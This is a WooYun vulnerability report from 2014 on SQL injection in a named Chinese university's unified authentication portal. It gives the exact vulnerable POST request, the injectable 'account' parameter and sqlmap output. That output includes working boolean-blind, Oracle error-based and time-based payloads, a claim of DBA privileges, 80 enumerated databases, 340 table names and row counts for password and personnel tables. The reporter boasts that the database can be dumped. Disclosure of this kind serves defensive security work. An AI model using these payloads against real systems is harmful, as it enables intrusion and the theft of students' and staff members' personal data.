某大学统一身份认证平台SQL注入，泄露师生信息 | wooyun-2014-082354

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2014-082354

漏洞标题：

某大学统一身份认证平台SQL注入，泄露师生信息

漏洞详情

披露状态：

2014-11-07：细节已通知厂商并且等待厂商处理中
2014-11-12：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

80个数据库，其中一个340个表，上百万数据，DBA权限，可拖库，然后走小厂商，恩，没错！

详细说明：

中国人民大学统一认证页面

https://cas.ruc.edu.cn/cas/login

登入处存在SQL注入
POST请求

POST /account/confirm.do?method=checkfs HTTP/1.1
Host: portal.ruc.edu.cn
Proxy-Connection: keep-alive
Content-Length: 32
Accept: */*
Origin: http://portal.ruc.edu.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://portal.ruc.edu.cn/account/confirm/reset1.jsp
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: neusoftrucportal=5mLFJVlbmZngfJh7TNbZ2yhm2XhstjG4WvywhLgWRT6MjcGyr6s2!608312459; BIGipServerruc_portal=3909593280.42271.0000; JSESSIONID=81FVJVkpTgZL17XvgDhy2c9Dp1hP4Yy5kQHmTJTKFSnQh64xxbWn!-1716597195; BIGipServeraccount=1762109632.2336.0000
RA-Ver: 2.7.0
RA-Sid: 65E7C870-20141014-044958-a23ba1-b78bcc
account=admin&fs=1&mobile=1111&mail=

漏洞证明：

证明，80个数据库，其中一个340个表，DBA权限，其他不列了，反正很多

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: account
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: account=admin' AND 2590=2590 AND 'SkMM'='SkMM&fs=1&mobile=1111&mail=
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
    Payload: account=admin' AND 4993=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(109)||CHR(121)||CHR(99)||CHR(113)||(SELECT (CASE WHEN (4993=4993) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(122)||CHR(100)||CHR(113)) AND 'XsTJ'='XsTJ&fs=1&mobile=1111&mail=
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: account=admin' AND 3183=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'oXbv'='oXbv&fs=1&mobile=1111&mail=
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
current user is DBA:    True
available databases [80]:
[*] ADOBE
[*] APEX_030200
[*] APPQOSSYS
[*] BND_HQ
[*] BNDTS
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DCP
[*] DCP_APPS
[*] DCP_CMS
[*] DCP_EDP
[*] DCP_EPSA
[*] DCP_PORTAL
[*] DCP_SNS
[*] DW_DEMO
[*] E_EVALUATE
[*] EDPSIS
[*] EDUIDC
[*] EPSA
[*] EPSA2
[*] EXFSYS
[*] FLOWS_FILES
[*] FRAME
[*] ICDC_EDU_REPORT
[*] ICDC_ODS
[*] ICDC_REPORT
[*] ICDC_RUC
[*] ICDC_UTIL
[*] IDC_I_COMM
[*] IDC_MAIL
[*] IDC_U2_DQ
[*] IDC_U2_GJJL
[*] IDC_U2_PUB
[*] IDC_U_BKJW
[*] IDC_U_COMM
[*] IDC_U_CW
[*] IDC_U_CW_1
[*] IDC_U_CW_2
[*] IDC_U_DXP
[*] IDC_U_HJ
[*] IDC_U_ISS
[*] IDC_U_KY
[*] IDC_U_KY2
[*] IDC_U_OA
[*] IDC_U_PUB
[*] IDC_U_REPORT
[*] IDC_U_RS
[*] IDC_U_RYZP
[*] IDC_U_SOFT
[*] IDC_U_STAT
[*] IDC_U_XM
[*] IDC_U_XS
[*] IDC_U_YJSJW
[*] IDC_YJS
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PERFSTAT
[*] PUBINFO
[*] RD_GRFW
[*] RUC_SWAPPER
[*] RUCOA
[*] RUCOA_GW
[*] SCOTT
[*] SIS
[*] SSO
[*] SSO_USER
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBLOGIC
[*] WMSYS
[*] XDB
[*] ZCT_MANAGER
[*] ZFT_MANAGER
Database: IDC_U_PUB
[340 tables]
+--------------------------------+
| A02BK                          |
| A03BK                          |
| A03BS                          |
| A03SS                          |
| A03SSCJ                        |
| A04BK                          |
| A04BS                          |
| A04EX                          |
| A04SS                          |
| A04SSCJ                        |
| A05BK                          |
| A05BS                          |
| A05EX                          |
| A05SS                          |
| A05SSCJ                        |
| AA10                           |
| AAAAA                          |
| AD_BUCKET                      |
| AD_COUNT                       |
| APPOINTMENTACLOWNERTABLE       |
| APPOINTMENTACLTABLE            |
| APPOINTMENTTABLE               |
| ATTACHMENT                     |
| BKJW_DM_DSZ                    |
| BKJW_DM_JSJY_CLBZ              |
| BKJW_DM_JSJY_HTBZ              |
| BKJW_DM_JSJY_JYLX              |
| BKJW_DM_JWCLBZ                 |
| BKJW_DM_PK_JSFPLB              |
| BKJW_DM_PK_JSFPXBBZ            |
| BKJW_DM_PK_PKBZ                |
| BKJW_DM_PK_ZT                  |
| BKJW_DM_SXFS                   |
| BKJW_DM_WYSLJ_HSJG             |
| BKJW_DM_WYSLJ_JFBZ             |
| BKJW_DM_WYSLJ_KSDJ             |
| BKJW_DM_YDCJZT                 |
| BKJW_PK_JSFP_TEMP              |
| BKJW_XK_XHKCHPC                |
| BKJW_XK_XHKCHPC_SFQY           |
| BT_EVENT                       |
| BT_EVENT_ACTION                |
| BT_EVENT_TYPE                  |
| BUSICATEGORY                   |
| CATALOG_ENTITY                 |
| CATALOG_PROPERTY_KEY           |
| CATALOG_PROPERTY_VALUE         |
| CHNDD                          |
| CHNDDDETAIL                    |
| CLU_1JMSSTATE                  |
| CLU_1JMSSTORE                  |
| CLU_2JMSSTATE                  |
| CLU_2JMSSTORE                  |
| CMV_NODE                       |
| CMV_NODE_ASSIGNED_ROLE         |
| CMV_NODE_VERSION               |
| CMV_NODE_VERSION_PROPERTY      |
| CMV_PROPERTY                   |
| CMV_VALUE                      |
| CM_NODE                        |
| CM_OBJECT_CLASS                |
| CM_PROPERTY                    |
| CM_PROPERTY_CHOICE             |
| CM_PROPERTY_DEFINITION         |
| CONTACTACLOWNERTABLE           |
| CONTACTACLTABLE                |
| CONTACTTABLE                   |
| CTEST                          |
| DATA_SYNC_APPLICATION          |
| DATA_SYNC_ITEM                 |
| DATA_SYNC_SCHEMA_URI           |
| DATA_SYNC_VERSION              |
| DICT_DATA_NOT_DISP             |
| DICT_TABLE_INFO                |
| DICT_YESNO                     |
| DISCOUNT                       |
| DISCOUNT_ASSOCIATION           |
| DISCUSSIONUSERTABLE            |
| DISTCNTTABLE                   |
| DISTLISTACLOWNERTABLE          |
| DISTLISTACLTABLE               |
| DISTLISTTABLE                  |
| DM_BZKZY                       |
| DM_BZRLB                       |
| DM_SXLX                        |
| DM_ZCLX                        |
| DM_ZYX                         |
| DRM_SYS_CODEINTEGRATION        |
| DRM_SYS_CONNECTIONPOOL         |
| DRM_SYS_DATASOURCE             |
| DRM_SYS_ENVIRONMENTVARIABLE    |
| DRM_SYS_FIELDCONVERTMAPPING    |
| DRM_SYS_FIELDSASSOCIATION      |
| DRM_SYS_FIELD_SCHEMA_EXTENDS   |
| DRM_SYS_MLTMEANINGFIELDS       |
| DRM_SYS_MLTMEANINGFIELDSDETAIL |
| DRM_SYS_PUBLICCODEMAINTENANCE  |
| DRM_SYS_TABLECONVERTMAPPING    |
| DRM_SYS_TABLE_SCHEMA_EXTENDS   |
| E$_SER_BKXX                    |
| ENTITY                         |
| FILE_PENDING                   |
| FLYCATEGORY                    |
| FLYOBJECT                      |
| FLYPARSER                      |
| FORUMACLOWNERTABLE             |
| FORUMACLTABLE                  |
| FORUMTABLE                     |
| FORUM_MESSAGES                 |
| GNBG_DM_BGZT                   |
| GNBG_DM_JJCD                   |
| GNBG_DM_SUBSYSTEM              |
| GNBG_XXXX                      |
| GNBG_XXXX_IMPORT               |
| GRADUATETEMP                   |
| GROUP_HIERARCHY                |
| GROUP_SECURITY                 |
| IDC_SYNC                       |
| IDC_U_BSHJBXX                  |
| IDC_U_GZZB                     |
| IDC_U_JZGJBXX                  |
| IDC_U_LSRYJBXX                 |
| IDC_U_LXSXX                    |
| IDC_U_RS_YXSBZXXX              |
| IDC_U_RS_YXSBZXXX_BAK          |
| IDC_U_RYJBXX                   |
| IDC_U_RYJBXX_20080826          |
| IDC_U_RYJBXX_20080826_1        |
| IDC_U_RYJBXX_LOG               |
| IDC_U_RYJBXX_TO_XSC            |
| IDC_U_XSJBXX                   |
| IDC_U_XSZSXX                   |
| IDC_U_XSZSXX_LOG               |
| INFO                           |
| INFO_AND_ATTACHMENT            |
| INFO_BOARD                     |
| INFO_BOARD_ADMIN               |
| INFO_BOARD_AND_INFO            |
| INFO_BOARD_AND_USER            |
| INFO_BOARD_TYPE                |
| INFO_BROWSE                    |
| JBXX                           |
| JMSSTATE                       |
| JMSSTORE                       |
| KY_DM_CDXMXZ                   |
| KY_DM_JGLB                     |
| KY_DM_PZJG                     |
| KY_DM_XKMLKJ                   |
| KY_KJXMJBQK                    |
| L10N_INTERSECTION              |
| L10N_LOCALE                    |
| L10N_RESOURCE                  |
| L10N_RESOURCE_TYPE             |
| LS_PERMISSION                  |
| LS_RESOURCE                    |
| MAIL_ADDRESS                   |
| MAIL_BATCH                     |
| MAIL_BATCH_ENTRY               |
| MAIL_HEADER                    |
| MAIL_MESSAGE                   |
| MESSAGEFILETABLE               |
| MESSAGETABLE                   |
| ORDER_ADJUSTMENT               |
| ORDER_LINE_ADJUSTMENT          |
| P13N_ANONYMOUS_PROPERTY        |
| P13N_ANONYMOUS_USER            |
| P13N_DELEGATED_HIERARCHY       |
| P13N_ENTITLEMENT_APPLICATION   |
| P13N_ENTITLEMENT_POLICY        |
| P13N_ENTITLEMENT_RESOURCE      |
| P13N_ENTITLEMENT_ROLE          |
| PAR_REPORT                     |
| PASSWORD                       |
| PBCATCOL                       |
| PBCATEDT                       |
| PBCATFMT                       |
| PBCATTBL                       |
| PBCATVLD                       |
| PF_BOOK_DEFINITION             |
| PF_BOOK_GROUP                  |
| PF_BOOK_INSTANCE               |
| PF_CONSUMER_PORTLETS           |
| PF_CONSUMER_PROPERTIES         |
| PF_CONSUMER_REGISTRY           |
| PF_DESKTOP_DEFINITION          |
| PF_DESKTOP_INSTANCE            |
| PF_LAYOUT_DEFINITION           |
| PF_LOOK_AND_FEEL_DEFINITION    |
| PF_MARKUP_DEFINITION           |
| PF_MENU_DEFINITION             |
| PF_PAGE_DEFINITION             |
| PF_PAGE_INSTANCE               |
| PF_PLACEHOLDER_DEFINITION      |
| PF_PLACEMENT                   |
| PF_PORTAL                      |
| PF_PORTLET_CATEGORY            |
| PF_PORTLET_CATEGORY_DEFINITION |
| PF_PORTLET_DEFINITION          |
| PF_PORTLET_INSTANCE            |
| PF_PORTLET_PREFERENCE          |
| PF_PORTLET_PREFERENCE_VALUE    |
| PF_PRODUCER_PROPERTIES         |
| PF_PRODUCER_REGISTRY           |
| PF_PROXY_PORTLET_INSTANCE      |
| PF_SHELL_DEFINITION            |
| PF_THEME_DEFINITION            |
| PLACEHOLDER_PREVIEW            |
| PLAN_TABLE                     |
| PLSQL_PROFILER_DATA            |
| PLSQL_PROFILER_RUNS            |
| PLSQL_PROFILER_UNITS           |
| POP3ATTACHMENTS                |
| POP3FOLDERS                    |
| POP3MESSAGEHEADERS             |
| POP3MESSAGES                   |
| POP3PREFERENCES                |
| POR_1JMSSTATE                  |
| POR_1JMSSTORE                  |
| POR_2JMSSTATE                  |
| POR_2JMSSTORE                  |
| PRODUCT_ACHIEVE                |
| PROPERTY_KEY                   |
| PROPERTY_VALUE                 |
| PUB_BBXX                       |
| PUB_DM_RYZTDYB                 |
| PUB_SFZHJC                     |
| QUERYFIELDS                    |
| QUERYFILTER                    |
| QUERYOBJECT                    |
| QUERYRELATION                  |
| ROLEACLS                       |
| ROLES                          |
| RP_BB                          |
| RP_BBMB                        |
| RP_BBNR                        |
| RP_GSDY                        |
| RP_ZB                          |
| RP_ZBMB                        |
| RS_GWPY_SBJBDM                 |
| RS_GWPY_SBLBDM                 |
| RS_GWPY_SBLXDM                 |
| RS_LSRYSFDM                    |
| RYJBXX_TEST                    |
| SCENARIO_END_STATE             |
| SEQUENCER                      |
| SEQUENCETABLE                  |
| SEQUENCETABLE_YEARNUM          |
| SEQUENCE_GENERATOR             |
| SERIALMGT                      |
| SER_BKXX                       |
| SER_DM_BKXXFLAG                |
| SMART_PERSONNEL                |
| SYS_ASSIGNER_AND_USER          |
| SYS_DEPT                       |
| SYS_GROUP                      |
| SYS_GROUP_USER                 |
| SYS_MODULE                     |
| SYS_MODULE_AND_TIME            |
| SYS_MODULE_TIME_LOG            |
| SYS_PERMISSION                 |
| SYS_PERMISSION_BAK             |
| SYS_PERMISSION_BAK060630       |
| SYS_PERM_AND_ORG               |
| SYS_PERM_AND_ROLE              |
| SYS_PERM_AND_ROLE_AND_ORG      |
| SYS_PERM_AND_URL               |
| SYS_PERM_AND_USER              |
| SYS_PERM_DATA_SCOPE            |
| SYS_PERM_LOG                   |
| SYS_RESOURCE                   |
| SYS_RESOURCE_BAK               |
| SYS_RESOURCE_BAK060630         |
| SYS_ROLE                       |
| SYS_ROLE_DATA                  |
| SYS_ROLE_DATA_SCOPE            |
| SYS_ROLE_MODULE                |
| SYS_ROLE_ORG                   |
| SYS_ROLE_ORG_USER              |
| SYS_ROLE_USER                  |
| SYS_ROLE_USER_BAK061222        |
| SYS_URL                        |
| SYS_USER                       |
| SYS_USER_DATA                  |
| SYS_USER_DATA_SCOPE            |
| SYS_USER_DEPT                  |
| SYS_USER_GROUP                 |
| SYS_USER_MODULE                |
| SYS_USER_ROLE                  |
| SYS_USER_ROLE_ORG              |
| TASKJOB                        |
| TEMPSTUDENT                    |
| TEST                           |
| TEST_ACCESS                    |
| TIANLC_TABLE                   |
| TODOACLOWNERTABLE              |
| TODOACLTABLE                   |
| TODOTABLE                      |
| TOPICFILETABLE                 |
| TOPICSUBTABLE                  |
| TOPICTABLE                     |
| TZFKQK                         |
| TZLLQK                         |
| UNIQUEIDGENERATOREJBTABLE      |
| USERACLS                       |
| USERROLES                      |
| USERS                          |
| USER_GROUP_CACHE               |
| USER_GROUP_HIERARCHY           |
| USER_PROFILE                   |
| USER_SECURITY                  |
| USER_SECURITYBAK               |
| USER_SECURITY_TEMP             |
| WEBLOGICJMSSTATE               |
| WEBLOGICJMSSTORE               |
| WEBLOGIC_IS_ALIVE              |
| WLCS_CATEGORY                  |
| WLCS_CREDIT_CARD               |
| WLCS_CUSTOMER                  |
| WLCS_ORDER                     |
| WLCS_ORDER_LINE                |
| WLCS_PRODUCT                   |
| WLCS_PRODUCT_CATEGORY          |
| WLCS_PRODUCT_KEYWORD           |
| WLCS_SAVED_ITEM_LIST           |
| WLCS_SECURITY                  |
| WLCS_SHIPPING_ADDRESS          |
| WLCS_SHIPPING_METHOD           |
| WLCS_TRANSACTION               |
| WLCS_TRANSACTION_ENTRY         |
| YJS_ZCJF_0507                  |
| YJS_ZCJF_05_07                 |
| ZHANGR                         |
| ZHANGRT                        |
| ZHAOQUAN                       |
| ZH_YJ1                         |
| ZH_YJ4                         |
| ZH_YJ5                         |
| ZH_YJ6                         |
| ZH_YJ7                         |
| ZH_YJ8                         |
+--------------------------------+
Database: IDC_U_PUB
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| IDC_U_RYJBXX_LOG               | 268128  |
| SYS_ROLE_USER                  | 215255  |
| SMART_PERSONNEL                | 89580   |
| SYS_ROLE_USER_BAK061222        | 88595   |
| IDC_U_XSZSXX_LOG               | 86414   |
| IDC_U_RYJBXX_20080826          | 84338   |
| IDC_U_RYJBXX_20080826_1        | 84338   |
| SYS_USER                       | 69390   |
| ZH_YJ4                         | 52187   |
| ZH_YJ5                         | 52187   |
| ZH_YJ7                         | 52142   |
| ZH_YJ1                         | 50313   |
| USER_SECURITY                  | 46645   |
| USER_GROUP_HIERARCHY           | 42457   |
| IDC_U_XSJBXX                   | 38867   |
| PUB_SFZHJC                     | 30268   |
| ENTITY                         | 28603   |
| PF_PLACEMENT                   | 28002   |
| PASSWORD                       | 27830   |
| USER_SECURITYBAK               | 27702   |
| ZHAOQUAN                       | 27302   |
| ZH_YJ6                         | 26499   |
| ZH_YJ8                         | 26499   |
| SYS_PERM_AND_ROLE              | 23573   |
| SYS_PERMISSION                 | 11341   |
| TEST_ACCESS                    | 10551   |
| PF_PORTLET_INSTANCE            | 8615    |
| GRADUATETEMP                   | 8034    |
| PF_BOOK_GROUP                  | 7534    |
| PF_DESKTOP_INSTANCE            | 6958    |
| SYS_RESOURCE                   | 6172    |
| RP_BBNR                        | 5931    |
| POP3MESSAGEHEADERS             | 5180    |
| YJS_ZCJF_0507                  | 5152    |
...省略
+--------------------------------+---------+

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-11-12 16:30

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源路人甲@乌云